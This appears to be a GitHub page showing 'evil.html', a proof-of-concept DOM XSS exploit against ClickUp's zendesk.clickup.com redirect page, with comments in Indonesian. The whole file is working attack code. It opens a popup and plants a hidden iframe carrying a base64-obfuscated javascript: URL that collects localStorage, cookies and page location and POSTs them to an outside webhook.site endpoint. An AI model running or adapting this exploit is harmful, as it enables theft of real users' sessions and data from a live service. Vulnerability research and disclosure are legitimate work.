-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathevil.html
More file actions
48 lines (43 loc) · 1.4 KB
/
evil.html
File metadata and controls
48 lines (43 loc) · 1.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<!DOCTYPE html>
<html>
<head><title>ClickUp DOM XSS PoC</title></head>
<body>
<h1>ClickUp DOM XSS via redirect.html + postMessage()</h1>
<p>Klik tombol → XSS jalan → steal localStorage + cookies</p>
<button onclick="exploit()">TRIGGER XSS</button>
<script>
function exploit() {
const payload = `
<script>
// Bypass semua filter dangerousProtocols & allowedDomains
const evil = "javascript:eval(atob('${btoa(`
// STEAL SEMUA DATA
const data = {
localStorage: JSON.stringify(localStorage),
cookies: document.cookie,
url: location.href,
origin: location.origin
};
// Kirim ke attacker
fetch('https://webhook.site/2c1d7ce8-a03c-4f27-9b1c-8919a32bd492/clickup-pwn', {
method: 'POST',
body: JSON.stringify(data),
headers: {'Content-Type': 'application/json'}
});
// Alert biar keliatan
alert('PWNED! Check webhook.site');
`)}'))";
// Bikin iframe invisible
const iframe = document.createElement('iframe');
iframe.src = 'https://zendesk.clickup.com/redirect.html?go=' + encodeURIComponent(evil);
iframe.style.display = 'none';
document.body.appendChild(iframe);
<\/script>
`;
// Buka popup
const win = window.open('', '_blank', 'width=600,height=400');
win.document.write(payload);
}
</script>
</body>
</html>